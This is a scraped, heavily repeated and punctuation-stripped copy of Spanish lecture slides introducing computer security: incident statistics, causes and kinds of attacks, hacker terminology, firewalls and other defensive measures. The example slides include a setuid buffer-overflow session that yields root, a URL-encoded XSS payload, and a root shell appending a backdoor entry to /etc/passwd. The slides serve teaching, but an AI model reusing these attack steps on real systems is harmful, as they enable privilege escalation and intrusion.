En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 5: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Virus informaacuteticos Troyanos Gusanos

bull Paacuteginas web ldquohostilesrdquo

bull ldquoSpywarerdquo

bull Entradas en sistemas ajenos

bull Robo de datos bancarios

bull Cambio de paacuteginas Web

bull Ataques DoS a nivel mundial

iquestLos sistemas son seguros

lthttpwwwiwarorgukiwarresourcestreatise-on-iwiwhtmgt

iquestLos sistemas son seguros

lthttpwwwcertorgstatsgt

1988

1989

1990

1991

1992

1993

1994

1995

1996

1997

1998

1999

2000

2001

2002

2003

0

37500

75000

112500

150000Incidentes (CERT)

1995

1996

1997

1998

1999

2000

2001

2002

2003

2004

2005

2006

0

2125

4250

6375

8500Vulnerabilidades sobre las que se ha informado (CERT)

iquestLos sistemas son seguros

Nuacutemero de incidentes sufridos por organizacioacuten 2004 E-Crime Watch Survey

Virus

lthttpworldmapf-securecomgtlthttpwwwf-securecomvirus-infostatisticsgt

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 6: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

iquestLos sistemas son seguros

lthttpwwwcertorgstatsgt

1988

1989

1990

1991

1992

1993

1994

1995

1996

1997

1998

1999

2000

2001

2002

2003

0

37500

75000

112500

150000Incidentes (CERT)

1995

1996

1997

1998

1999

2000

2001

2002

2003

2004

2005

2006

0

2125

4250

6375

8500Vulnerabilidades sobre las que se ha informado (CERT)

iquestLos sistemas son seguros

Nuacutemero de incidentes sufridos por organizacioacuten 2004 E-Crime Watch Survey

Virus

lthttpworldmapf-securecomgtlthttpwwwf-securecomvirus-infostatisticsgt

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 7: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

iquestLos sistemas son seguros

Nuacutemero de incidentes sufridos por organizacioacuten 2004 E-Crime Watch Survey

Virus

lthttpworldmapf-securecomgtlthttpwwwf-securecomvirus-infostatisticsgt

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

